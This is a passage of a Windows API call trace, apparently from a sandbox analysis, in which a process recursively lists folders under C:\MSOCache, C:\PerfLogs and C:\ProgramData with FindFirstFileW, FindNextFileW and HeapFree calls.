[0133.683] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0133.683] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0133.683] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa2ea58 [0134.388] FindNextFileW (in: hFindFile=0xa2ea58, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0134.388] FindNextFileW (in: hFindFile=0xa2ea58, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0134.388] FindNextFileW (in: hFindFile=0xa2ea58, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0134.388] FindNextFileW (in: hFindFile=0xa2ea58, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0134.388] FindNextFileW (in: hFindFile=0xa2ea58, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0134.388] FindNextFileW (in: hFindFile=0xa2ea58, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0134.388] FindClose (in: hFindFile=0xa2ea58 | out: hFindFile=0xa2ea58) returned 1 [0134.521] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0134.521] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0134.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa2e518 [0134.590] FindNextFileW (in: hFindFile=0xa2e518, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0134.590] FindNextFileW (in: hFindFile=0xa2e518, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0134.590] FindNextFileW (in: hFindFile=0xa2e518, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0134.590] FindNextFileW (in: hFindFile=0xa2e518, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0134.590] FindNextFileW (in: hFindFile=0xa2e518, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0134.590] FindNextFileW (in: hFindFile=0xa2e518, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0134.590] FindClose (in: hFindFile=0xa2e518 | out: hFindFile=0xa2e518) returned 1 [0134.590] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0134.591] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0134.591] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa2e518 [0137.304] FindNextFileW (in: hFindFile=0xa2e518, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.304] FindNextFileW (in: hFindFile=0xa2e518, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.304] FindNextFileW (in: hFindFile=0xa2e518, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.304] FindNextFileW (in: hFindFile=0xa2e518, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.304] FindNextFileW (in: hFindFile=0xa2e518, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.305] FindNextFileW (in: hFindFile=0xa2e518, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0137.305] FindClose (in: hFindFile=0xa2e518 | out: hFindFile=0xa2e518) returned 1 [0137.305] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0137.305] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0137.305] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa2e408 [0137.326] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.326] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.326] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.326] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.326] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.326] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0137.326] FindClose (in: hFindFile=0xa2e408 | out: hFindFile=0xa2e408) returned 1 [0137.326] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0137.326] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0137.326] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa2e408 [0137.365] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.365] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.365] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.365] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.365] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.365] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0137.365] FindClose (in: hFindFile=0xa2e408 | out: hFindFile=0xa2e408) returned 1 [0137.366] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0137.366] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0137.366] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa2e4d8 [0137.727] FindNextFileW (in: hFindFile=0xa2e4d8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.727] FindNextFileW (in: hFindFile=0xa2e4d8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.727] FindNextFileW (in: hFindFile=0xa2e4d8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.727] FindNextFileW (in: hFindFile=0xa2e4d8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.727] FindNextFileW (in: hFindFile=0xa2e4d8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0137.727] FindNextFileW (in: hFindFile=0xa2e4d8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0137.728] FindClose (in: hFindFile=0xa2e4d8 | out: hFindFile=0xa2e4d8) returned 1 [0137.728] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0137.728] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0137.728] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa2e408 [0139.048] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.048] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa2e4d8 [0139.049] FindNextFileW (in: hFindFile=0xa2e4d8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.049] FindNextFileW (in: hFindFile=0xa2e4d8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.049] FindNextFileW (in: hFindFile=0xa2e4d8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.049] FindClose (in: hFindFile=0xa2e4d8 | out: hFindFile=0xa2e4d8) returned 1 [0139.051] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0139.051] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.051] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.052] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.052] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.052] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.052] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.052] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.052] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.052] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.052] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.052] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.053] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.053] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.053] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.053] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.053] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.053] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.053] FindClose (in: hFindFile=0xa2e408 | out: hFindFile=0xa2e408) returned 1 [0139.053] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0139.053] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.053] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa28f08 [0139.204] FindNextFileW (in: hFindFile=0xa28f08, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.204] FindNextFileW (in: hFindFile=0xa28f08, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa327e8 [0139.316] FindNextFileW (in: hFindFile=0xa327e8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.316] FindNextFileW (in: hFindFile=0xa327e8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.316] FindNextFileW (in: hFindFile=0xa327e8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.317] FindNextFileW (in: hFindFile=0xa327e8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.317] FindNextFileW (in: hFindFile=0xa327e8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.317] FindNextFileW (in: hFindFile=0xa327e8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.317] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0139.317] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.317] FindNextFileW (in: hFindFile=0xa28f08, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.317] FindNextFileW (in: hFindFile=0xa28f08, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.317] FindNextFileW (in: hFindFile=0xa28f08, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.317] FindNextFileW (in: hFindFile=0xa28f08, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.317] FindClose (in: hFindFile=0xa28f08 | out: hFindFile=0xa28f08) returned 1 [0139.317] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0139.318] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32828 [0139.385] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.385] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.385] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.385] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.386] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.386] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.386] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.386] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.386] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.386] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.386] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.386] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.386] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.386] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.387] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.387] FindClose (in: hFindFile=0xa32828 | out: hFindFile=0xa32828) returned 1 [0139.387] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0139.388] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.388] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32828 [0139.650] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.650] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.650] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.650] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.650] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.650] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.650] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.650] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.650] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.650] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.650] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.650] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.651] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.651] FindNextFileW (in: hFindFile=0xa32828, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.651] FindClose (in: hFindFile=0xa32828 | out: hFindFile=0xa32828) returned 1 [0139.651] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0139.651] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.651] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa328e8 [0139.753] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.753] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.753] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.754] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0139.754] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0139.754] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0139.754] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.754] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0 [0139.754] FindClose (in: hFindFile=0xa281c8 | out: hFindFile=0xa281c8) returned 1 [0139.754] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0139.756] FindNextFileW (in: hFindFile=0xa279c8, lpFindFileData=0x253fc28 | out: lpFindFileData=0x253fc28) returned 1 [0139.756] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0xa328e8 [0139.756] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0139.756] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0139.756] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa32928 [0139.757] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.757] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0139.757] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0139.757] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0139.757] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0 [0139.757] FindClose (in: hFindFile=0xa328e8 | out: hFindFile=0xa328e8) returned 1 [0139.757] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0139.758] FindNextFileW (in: hFindFile=0xa279c8, lpFindFileData=0x253fc28 | out: lpFindFileData=0x253fc28) returned 1 [0139.758] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\*", lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0xa328e8 [0139.758] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0139.758] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0139.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa32928 [0139.759] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.759] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.759] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.759] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa329a8 [0139.760] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.760] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.760] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329e8 [0139.760] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.760] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.760] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32a28 [0139.760] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 1 [0139.760] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 1 [0139.761] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0139.761] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0139.761] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0 [0139.761] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0139.761] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.761] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.761] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.761] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.761] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.761] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.761] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.762] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.762] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.762] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.762] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.763] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa329a8 [0139.763] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.763] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.763] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.763] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.763] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.763] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.764] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.764] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0139.765] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0139.765] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0139.765] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0139.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Application Data\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xffffffff [0139.765] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0139.765] FindNextFileW (in: hFindFile=0xa328e8, 